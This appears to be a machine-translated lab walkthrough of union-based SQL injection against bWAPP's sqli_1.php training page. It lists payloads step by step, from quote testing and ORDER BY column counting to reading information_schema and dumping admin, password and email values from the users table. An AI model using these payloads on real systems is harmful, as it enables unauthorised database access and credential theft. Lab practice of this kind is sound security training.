1, test there is no injection point, if there is what type of injection, first in the "title=1" after adding a single quotation marks to see the results, such as:
The error contains a "%" hint, so you can identify the search-type SQL injection.
2, input "title=1% ' and '% ' = '" or "title=1% ' or '% ' = '", no error, and "title=1% ' or '% ' = '" Display page as follows:
Then start injecting.
3, Judge the number of fields:
Enter "title=1% ' ORDER by 7--+", the page returns to normal; enter "title=1% ' ORDER by 8--+", the page returns "Error:unknown column ' 8 ' in ' order clause '", indicating the number of fields is 7, as :
The comment here to use "--" instead of "#", as for the reason I do not know, if there are Daniel See, hope to enlighten.
4, query database name and other information:
First look at the location shown, enter: "title=1% ' Union select 1,2,3,4,5,6,7--+", such as:
Then enter "title=1%" union Select 1,database (), version (), 4,user (), 6,7--+ "View the database name, database version, current database user, such as:
5. Query Table name:
Enter "title=1%" union Select 1,database (), version (), Table_name,user (), 6,7 from Information_schema.tables where Table_ Schema= ' Bwapp '--+ ', results
It is obvious that we want to view the users table.
6. Query Field Name:
Enter "title=1%" union Select 1,database (), version (), Column_name,user (), 6,7 from Information_schema.columns where Table_ Name= ' users '--+, as a result:
There are many fields in the Users table, we focus on admin, password, email three fields.
7, query the contents of the field:
Enter "title=1%" union Select 1,database (), version (), Group_concat (admin, "| |", password, "| |", email), User (), 6,7 from users --+ ", the results are as follows:
With these steps, it is interesting to try other tables and other fields on your own.
The Bwapp of SQL injection sqli_1.php
